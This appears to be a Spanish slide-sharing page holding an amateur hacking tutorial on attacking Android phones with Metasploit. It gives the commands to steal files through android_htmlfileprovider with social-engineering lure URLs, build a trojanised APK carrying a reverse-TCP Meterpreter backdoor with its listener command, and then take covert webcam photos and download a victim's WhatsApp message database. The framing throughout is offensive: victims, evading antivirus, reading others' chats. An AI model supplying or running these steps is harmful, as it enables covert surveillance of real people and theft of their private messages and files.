Angel Montesflores España, profile picture
Subido porAngel Montesflores España
130 vistas

Android

Este documento describe cómo usar Metasploit para robar archivos de un dispositivo Android y crear una puerta trasera en un dispositivo Android. Primero, se usa el módulo auxiliary/gather/android_htmlfileprovider para robar archivos como hosts. Luego, msfpayload se usa para crear un APK infectado con una carga útil Meterpreter reversa TCP que establece una sesión cuando se instala. Esto permite tomar fotos con la cámara, ver información del sistema y descargar archivos como las bases de datos de WhatsApp del disposit

Incrustar presentación

Descargar para leer sin conexión
PENTEST & Support Gathering en Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
Bueno en mi casó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
Bueno, acá ven eso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
O sí! Am sacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
Bueno ahora la victima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
Uo! cuantos comandos! Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
No sé ve muy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
Oh! hemos encontrado el directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
la database llamado : “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.

Más contenido relacionado

PDF
Penetrar un servidor unix por el puerto 139 con metasploit
porBTshell-Fran
 
PDF
Batch
poralan moreno
 
PDF
Hack x crack_batch2
porJuan Jose Garcia Sanchez
 
PDF
Proof of concept: Auditando sistema con METASPLOIT
porBTshell-Fran
 
DOC
librarse de un troyano (El libro del hacker capitulo 8)
porHammerBlanco
 
DOCX
Doc trashes24214
porRICK RAMOS
 
DOCX
Borrar tashes
porAdrian Duque Ocampo
 
DOC
Mantenimeinto
porcartonskcc
 
Penetrar un servidor unix por el puerto 139 con metasploit
porBTshell-Fran
 
Batch
poralan moreno
 
Hack x crack_batch2
porJuan Jose Garcia Sanchez
 
Proof of concept: Auditando sistema con METASPLOIT
porBTshell-Fran
 
librarse de un troyano (El libro del hacker capitulo 8)
porHammerBlanco
 
Doc trashes24214
porRICK RAMOS
 
Borrar tashes
porAdrian Duque Ocampo
 
Mantenimeinto
porcartonskcc
 

La actualidad más candente

PDF
Ataque kali
porFrancisco Javier Mejías Fernández
 
PDF
Manual de Lenguaje Batch
porMauricio Melo
 
PDF
Uso de Excepciones en JAVA
porinnovalabcun
 
PPTX
Práctica de calculadora documentada
porTochis
 
DOCX
Destructores
porDiego Ramon Sanchez
 
DOCX
Primero quiero que entiendas algo
porAndrea Paz
 
PPS
Problemas con el_ordenador
porReflexiones PowerPoint
 
PPS
Computer Problems Ra
porUlises Isaza
 
PPS
Problemas Con El Ordenador
porEl Ojo Kanalla .
 
PPS
Computer Problems Ra
porguestcf37ef
 
PPS
PROBLEMAS CON EL PC
porconillet
 
PPS
Problemas con el ordenador
porcentrowebs
 
Ataque kali
porFrancisco Javier Mejías Fernández
 
Manual de Lenguaje Batch
porMauricio Melo
 
Uso de Excepciones en JAVA
porinnovalabcun
 
Práctica de calculadora documentada
porTochis
 
Destructores
porDiego Ramon Sanchez
 
Primero quiero que entiendas algo
porAndrea Paz
 
Problemas con el_ordenador
porReflexiones PowerPoint
 
Computer Problems Ra
porUlises Isaza
 
Problemas Con El Ordenador
porEl Ojo Kanalla .
 
Computer Problems Ra
porguestcf37ef
 
PROBLEMAS CON EL PC
porconillet
 
Problemas con el ordenador
porcentrowebs
 

Destacado

PPTX
Case study of shukla villa, ahmedabad
porYatharth Thakkar
 
PDF
A tabela detalhada da Copa do Nordeste 2017
porCassio Zirpoli
 
PDF
Arboles avl
porAngel Montesflores España
 
PDF
Python
porAngel Montesflores España
 
PPTX
Elearning1
porAngel Montesflores España
 
PPTX
Elearning2
porAngel Montesflores España
 
PDF
Энциклопедия домашней медицины
porlehen
 
PDF
Источник на краю света
porlehen
 
PDF
SWong_Logo Usage Guide
porSandra Wong
 
PPT
Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012
porFLOW Public Relations
 
PPT
學生品格的轉變
por素妹 張
 
PDF
Echo 91 decembre 2016 (1)
porOrgerus Mairie
 
PPT
звіт
porLarisa Deriyenko
 
PDF
Letters of credit the way to win win
porBrian Ward
 
PPTX
Poradu
porLarisa Deriyenko
 
PPTX
презентація (шохирева)
porLarisa Deriyenko
 
PPT
09 P2.Castletowns
pormripmof
 
PPT
gestão participativa “Nenhum de nós é tão bom quanto todos nós juntos”
porAna Glenyr
 
PDF
Agenda dies58
porSyaiful Anam
 
PDF
Gifted web quest
porRKG123123
 
Case study of shukla villa, ahmedabad
porYatharth Thakkar
 
A tabela detalhada da Copa do Nordeste 2017
porCassio Zirpoli
 
Arboles avl
porAngel Montesflores España
 
Python
porAngel Montesflores España
 
Elearning1
porAngel Montesflores España
 
Elearning2
porAngel Montesflores España
 
Энциклопедия домашней медицины
porlehen
 
Источник на краю света
porlehen
 
SWong_Logo Usage Guide
porSandra Wong
 
Európai mobilhasználati szokások - Norton Kiberbűnözési Jelentés 2012
porFLOW Public Relations
 
學生品格的轉變
por素妹 張
 
Echo 91 decembre 2016 (1)
porOrgerus Mairie
 
звіт
porLarisa Deriyenko
 
Letters of credit the way to win win
porBrian Ward
 
Poradu
porLarisa Deriyenko
 
презентація (шохирева)
porLarisa Deriyenko
 
09 P2.Castletowns
pormripmof
 
gestão participativa “Nenhum de nós é tão bom quanto todos nós juntos”
porAna Glenyr
 
Agenda dies58
porSyaiful Anam
 
Gifted web quest
porRKG123123
 

Similar a Android

PDF
Metasploit
porJose Peña
 
PDF
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
PPTX
Comprometiendo dispositivos con software legal - H-C0N 2018
porMatías Moreno Cárdenas
 
PPTX
Troyanizando y Auditando Android - HoneyCON
porMatías Moreno Cárdenas
 
PDF
Ataque win xp
pordarlyjazmin
 
PPTX
Escaneo de Puertos
porarnoldvq16
 
PPTX
CTF Brainpan
porDiego Ramírez González
 
PDF
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
porJose Gonzales
 
PDF
Metasploit
porCristian Alejandro Rojas Quintero
 
PDF
Seguridad: Backtrack2
porFrancesc Perez
 
PDF
Taller Android Navaja Negra 5 ED
pormirojo
 
PDF
Episodio de pentesting
porakencito
 
PPT
Maitaining access
porTensor
 
PPT
MAITAINING ACCESS
porTensor
 
PPTX
Actualidad del malware en Android, detección y otros temas
porLuis Delgado
 
PDF
Karmetasploit - Entorno de entrenamiento de seguridad informática
porDaniel
 
PDF
Network.Penetration.CGSOL
porykro
 
PPTX
Presentation OWASP Day @ FIUBA.AR
porBonsai Information Security
 
PDF
Pimp your Android. Rooted CON 2012.
porInternet Security Auditors
 
PPTX
CPMX5 - Hacking like a boss por Roberto Salgado
porWebsec México
 
Metasploit
porJose Peña
 
731066678-Tema-6-Post-Explotacion-731066678-Tema-6-Post-Explotacion.pdf.pdf
porDavid Vera Olivera, PMP®, ITIL, SCM®
 
Comprometiendo dispositivos con software legal - H-C0N 2018
porMatías Moreno Cárdenas
 
Troyanizando y Auditando Android - HoneyCON
porMatías Moreno Cárdenas
 
Ataque win xp
pordarlyjazmin
 
Escaneo de Puertos
porarnoldvq16
 
CTF Brainpan
porDiego Ramírez González
 
Web App Hacking and Penetration Testing - (RFI - LFI & RCE)
porJose Gonzales
 
Metasploit
porCristian Alejandro Rojas Quintero
 
Seguridad: Backtrack2
porFrancesc Perez
 
Taller Android Navaja Negra 5 ED
pormirojo
 
Episodio de pentesting
porakencito
 
Maitaining access
porTensor
 
MAITAINING ACCESS
porTensor
 
Actualidad del malware en Android, detección y otros temas
porLuis Delgado
 
Karmetasploit - Entorno de entrenamiento de seguridad informática
porDaniel
 
Network.Penetration.CGSOL
porykro
 
Presentation OWASP Day @ FIUBA.AR
porBonsai Information Security
 
Pimp your Android. Rooted CON 2012.
porInternet Security Auditors
 
CPMX5 - Hacking like a boss por Roberto Salgado
porWebsec México
 

Último

PDF
TEMA 5 EL SEXENIO DEMOCRÁTICO.(1868-1874).pdf
pormartacarretero08
 
PDF
El castillo del dragón. Karen Pájaro Azul (Microrelato)
porKaren Pájaro Azul
 
PDF
Mis pinturas costumbristas dominicanas nacen del amor por nuestras tradicione...
porEusebioVidal1
 
PDF
EL PUEBLO VIEJO DE INDIOS..pdf. "Nuestra historia no está en los libros nacio...
porHermanRolandoTroncos
 
PDF
En mis cuadros, la cultura dominicana cobra vida. Escenas sencillas, rostros ...
porEusebioVidal1
 
PDF
House _Brigade Vinyl Session en Mallorca
pornicociarliero
 
PDF
Calendario-Mensual-2026-Snoopy-Naranja.pdf
porClickafeGarzon
 
PDF
Copia de 10.La-Drogadiccion-en-Mexico.pdf
porchavez19850709
 
PPTX
el teatro, definición, tipos de teatro, características del teatro
porLuisGerardoAraujoLoa
 
PPTX
ESTUDIO SOBRE LOS SIMBOLOS SATANICOS 2025.pptx
porMaritzaMarroquin
 
TEMA 5 EL SEXENIO DEMOCRÁTICO.(1868-1874).pdf
pormartacarretero08
 
El castillo del dragón. Karen Pájaro Azul (Microrelato)
porKaren Pájaro Azul
 
Mis pinturas costumbristas dominicanas nacen del amor por nuestras tradicione...
porEusebioVidal1
 
EL PUEBLO VIEJO DE INDIOS..pdf. "Nuestra historia no está en los libros nacio...
porHermanRolandoTroncos
 
En mis cuadros, la cultura dominicana cobra vida. Escenas sencillas, rostros ...
porEusebioVidal1
 
House _Brigade Vinyl Session en Mallorca
pornicociarliero
 
Calendario-Mensual-2026-Snoopy-Naranja.pdf
porClickafeGarzon
 
Copia de 10.La-Drogadiccion-en-Mexico.pdf
porchavez19850709
 
el teatro, definición, tipos de teatro, características del teatro
porLuisGerardoAraujoLoa
 
ESTUDIO SOBRE LOS SIMBOLOS SATANICOS 2025.pptx
porMaritzaMarroquin
 

Android

  • 1.
    PENTEST & Support Gatheringen Android y Backdoor [Con Metasploit] Por J0K3$/Icebreaker Nivel de Paper = Básico Gathering: Robo de Archivo en Android [Metasploit] Hola! En esta parte del paper explicaremos como conseguir información del Android, primero de todo cargaremos metasploit, bien sea en su windows/mac/linux, bueno una vez cargado usaremos el siguiente “Auxiliar” : use auxiliary/gather/android_htmlfileprovider Ya vieron una vez cargado , pueden hacer un “show options” , si quieren , bueno ahora lo que tenemos que hacer es indicarles el archivo a robar de android, para eso os dejo acá una lista de los path de los directorios , para mi , interesantes.....
  • 2.
    Bueno en micasó no cogeré ninguna de esas cogeré, otras pues usare mi maquina virtual para , que no me demore mucho tiempo , pero pueden usar una de esas, por si les interesa algún directorio en especial , Ok?! Empecemos acá les dejo una foto de mi configuración y ahora les explicare punto por punto para que es cada. Bueno, expliquemos esto por partes.... Files = Esté sera el archivo que robaran de android, me explico? El path …..en mi caso será hosts. URIPATH= Le coloqué este “/” es lo que ira detrás de la ip, pueden poner algo así para la ing social, por ejemplo /HackPou ...por ejemplo ese supuesto hack para el juego y saldria así : “Ip”/HackPou SRVPORT= Al principio saldría 8080 pero para no darle el puerto ese pues la dirección quedaría así al entregársela a la víctima “ip”:8080/HackPou , pues les extrañaría aunque también hay shorten , pero lo podrían ver en la barrita de arriba al ejecutarlo...Entonces déjenlo como 80 y no se visualizara [Porque es protocolo HTTP].... Bueno le daremos la dirección que nos da para los ataques locales la de Local Ip , osease le daré esa ip haber que me muestra el exploit GO! .
  • 3.
    Bueno, acá veneso es la ip local , de el dispositivo atacado , y su versión de android + modelo del dispositivo ¿No está mal ? Eh ...Bueno este ataque es muy bueno , con una combinación que diré al final ….. Pero pasémonos a la otra parte del paper no? ….¿Tienen miedo? Backdoor en Android. Tomando el Control del dispositivo. [Metasploit] Bueno en esté punto dirán ! ¿Enserio? Se puede penetrar mi android, de una forma sencilla...saltándose antivirus …..Pues si, primero actualicen metasploit si llevan tiempo sin hacerlo , pues salieron algunos módulos nuevos bueno , pasemos a la acción primero dentro de la consola de metasploit colocaremos esto …. search android Bueno verán los siguientes módulos.....
  • 4.
    O sí! Amsacado un exploit handler, y 2 payloads...mmm.... saquemos un APK infectada ¿No? Claro....bueno como creamos este apk? Pues fácil con msfpayload , yo lo creare de Meterpreter, por si no lo saben meterpreter es el “Troyano” de metasploit ,con funciones interesantes. Para crearlo abrimos una terminal y ponemos lo siguiente..... sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=”Ip local o Externa” R > “Ruta+Archivo.apk” Ejemplo: sudo msfpayload payload/android/meterpreter/reverse_tcp LHOST=192.168.1.35 R > /home/icebreaker/Escritorio/HackPou.apk Bueno , dirán si han hecho “backdoors” para metasploit , ! J0k3$ J0k3$ ! , por qué pones “R” si siempre creamos el ejecutable con “X” , tenemos que decirle a msfpayload que use la salida RAW. Eso en otros payloads nos sacaría el shellcode sin formato, pero en el caso de Android nos sacara un apk! , jejej bien ¿no? Pueden comprobarlo con el comando “file nombre.apk” y les saldrá la info todo bien escrito....Bueno una vez hecho eso, cargamos el exploit …... sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E ejemplo: sudo msfcli exploit/multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST=”Su ip puesta en el backdoor” E
  • 5.
    Bueno ahora lavictima cuando se instale la Apk, infectada nos saldrá esto.... O sí! Tenemos la sesión ese android es nuestro! , ahora podemos , poner Help , para ver los comandos que nos brinda Meterpreter ,para esté dispositivo.
  • 6.
    Uo! cuantos comandos!Probemos alguno como ...”Sysinfo”..... Mmmm ! Buena información , probemos ….Webcam_Snap....Esté es para echar una foto con el teléfono infectado.....
  • 7.
    No sé vemuy bien xD jajaj pero bueno, es la cámara de mi móvil...XD jajajajaj , y como vieron antes jajaja no es muy bueno ni nuevo...XD jajajja....Bueno probemos shell....Esté es mi comando preferido.... O sí! , que bonitos directorios del android infectado …..bueno entremos en sdcard haber que encontramos....
  • 8.
    Oh! hemos encontradoel directorio de WhatsApp.....Salgamos y movamos con meterpreter hacia este directorio para descargarnos algo.... Bueno bueno, les explico lo que uso en la imagén para moverme....son estos 2 comandos... pwd = Es para ver en que directorio empezamos inicialmente.... cd = para avanzar o retroceder [Parar retroceder sería así :” cd .. “] entramos en alguna carpeta como podria ser Databases, y descargamos el archivo de
  • 9.
    la database llamado: “msgstore.db.crypt” , bueno ese archivo tiene las conversaciones de whatsapp también podrían descargar imágenes...etc de todo , después de descargarlo usen algo como un whatsapp decripter y desencripten las conversaciones para leerlas...ya are un paper de como se hacen …. Saludos y que les allá servido de algo. Gracias a Pentest And Support , especialmente gracias a David Urióstegui.